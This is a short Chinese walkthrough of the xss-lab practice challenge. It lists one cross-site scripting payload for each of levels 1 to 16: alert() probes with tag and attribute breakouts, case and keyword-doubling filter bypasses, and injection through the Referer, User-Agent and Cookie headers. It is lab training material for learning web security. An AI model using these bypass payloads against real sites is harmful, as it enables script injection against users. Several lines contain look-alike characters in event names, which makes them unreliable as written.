xss注入实验（xss-lab）

• xss-lab

1. 第一关

代码：<Script>alert(1)</Script>

1. 第二关

代码：1"><ScRipt>alert(1)</ScRipt>

1. 第三关

代码：' onclick ='javascript:alert(1)'//

1. 第四关

代码：" onclick ="javascript:alert(1)"//

1. 第五关

代码："></input><a href='javascript:alert(1)'>www</a>//

1. 第六关

代码：1"><ScRipt>alert(1)</ScRipt>

1. 第七关

代码：1"><ScscriptRipt>alert(1)</ScscriptRipt>

1. 第八关

代码：

javascript:alert(1)

1. 第九关

代码：

javascript:alert('1') //http://www.baidu.com

1. 第十关

代码：&t_sort=" type='text' οnclick='javascript:alert(1)'>//

1. 第十一关

代码：添加referer字段：'" type='text' οnblur='javascript:alert("aini")'

1. 第十二关

代码：更改user-agents字段：user-agent：'" type='text' οnclick='alert(123)'

1. 第十三关

代码：Cookie: '" type='text' οnclick='alert(123)'

1. 第十四关

代码：直接更改url，重定向到15关

1. 第十五关

代码：?src='level1.php?name=<p οnmοusedοwn=alert()>哈哈哈</p>'

1. 第十六关

代码：keyword=<img%0Dsrc=1%0Dοnerrοr=alert(1)>